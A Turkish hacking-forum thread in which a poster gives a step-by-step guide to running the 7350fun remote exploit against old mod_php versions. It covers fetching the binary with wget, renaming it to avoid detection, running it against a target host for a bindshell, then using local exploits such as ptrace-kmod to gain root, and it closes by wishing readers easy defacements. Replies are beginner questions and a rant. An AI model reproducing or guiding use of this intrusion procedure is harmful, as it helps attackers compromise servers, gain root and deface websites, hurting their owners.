Web sitesi Güvenliği, DOS - DDOS Saldırıları...
Php 4.0.2-4.0.7 Remote Sploit By Moliver
Php 4.0.2-4.0.7 Remote Sploit By Moliver
-
biraz *nix ağırlıklı hacking için annatayım dedim ..
Kullancağımız araçlar püsürler :
shell account veya linux b0x
------------------------------
shellimze yada b0xımızla ilk login oluyoruz daha sonra
wget http://www.packetstormsecurity.org/removed/7350fun
eğer shell kullnıyorsanız root çakmasın diye mv 7350fun ttx yada farklı bir dosya ismine çevirin sadece bir önlem tabi
daha sonra chmod +x ttx neden böle yaptık binary file bu gerekli chmodu verdik çalışsın diye ...
./ttx deyince sploitniiz çalışır
ver karşınıza sploitin konsolu çıkar :
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.usage: ./ttx [options] <hostname> <phpfile>
Options:
-c check exploitability only, do not exploit
-n no check mode
-s start bruteforce start (top)
-t target choose target
(1) PHP v4.0.2rc1-v4.0.5
(2) PHP v4.0.6-v4.0.7RC2
./ttx -t target host /php dosyasişimdi target ksımıına php versionuna göre 1 veya 2 diyoruz
daha sonra hostu yazıyoruz ve php dosyasının yerini belirtiyoruz
örn :
./ttx -t 1 www.ornek.com /forum/index.php
gibi yapıyorux sonra okeyliyoruz [bfffad3] ++++ gibi tarmaya başlar biraz uzun sürer bu bekliceksiniz daha sonra işlem bitince
komut satırı
kısmı gelcek bi dir yada ls -al çekerseniz dosyaları listelicek size bindshell dediğimiz olayı hazırlamış oluyor ...
daha sonra idnizi 0 yapmak lazım root yetkisi yani bir local sploit bulun genellikle bu tip sistemlere girerseniz eski olur o yüzden ptrace-kmod hatarihanzo gibi sploitler root almak için yeterli olur ..
local exploiterliniz tmp içine atın çünkü yazıdrma yetkisi bi orda var
eğre dosyayaı çekerken wget yemesse ftp ile çekin olda olmassa lynx -dump file diye çekin oda olmassa kodu alınnn pico amele diye kaydedin
biraz linux bilginiz olursa zaten annarsınız...
kolay gelsin ii defaceler ..
----------------- Powered BY CTR TEAM -------------------
Yazan : MoLiVeR Yardımım dokunduysa ne mutlu bana
bunu başka sitelerde kullanırken lütfen yazarın ismini felam yazın tittirmeyin belanızı :P
-
Bu İş Nasıl Yapılır Anlamadım Gitti bi Türlü... Bunu Yapınca Siten yi Hacklemiş mi oLuyoruz Nasıl oLuyor.. Biraz Daha Amatörce Anlatırmısın Biz Siz Gibi Bilmiyoz Bu işLeri Öğrenelim aqa :)
-
arkadaş bu php sürümleri için exploit bununla sistem de root oluyosun
-
Güzel anlatmış arkadaş zaten...
-
bindshell olayı ne demek?
-
ya dostum çok sazansınız yaw yk sade dille anlat falan demeyin bu adamlar zaten bilseler kendileri yaparlar bir ikinciside kendi bilmiyor ki basitini gidiyor başak siteden kopyala yapıştır yapıyor sonra buraya getirip ahkam kesiyor soru sorsan bilemez eminm yarın sölim der araştırı falan sonra tekrar kopyala yapıştır sana yollar ben tanımam bunları benim evimde 4 yıldır internet var anlata biliyor muyum zaten bu işi bilen adamınburda ne işi var değil mi?sen bilseydin burda olur muydun kekır değil de hacker olsaydın site güzel adamlar güzel yre değin miş ce ekmeklerini yiyorlar ve o yüzden hacker belki nlar olabilir ama ötekiler asla olmazlar zaten yok şu programı kullan yok bunu kullan fallan adları nerden ezberliyorlarsa artık işte kendilerini eolarını tatmin ediyorlsar bu şekilde hack dediğin adm zaten kendi yazar kendi yapar boş verin siz bunları program simi ezberleyeceğine biraz dil örenseniz belki bir şeyler yapatsınız benden tavsiye bu tüe adamalra da nasıl yapıyorsunuz demekten vazgeçin salak durumuna düşürmeyin kendinizi işte ben burdayım madem öle hacklesinler benide görem adminler hariç onlar yapabilirler birşey demem neyse hade bakam....kendinize ii bakın güzel bir site güzel bilgile vriyor herkesin emeğine tşkler sağlıcakla kalın!!!!!!!!!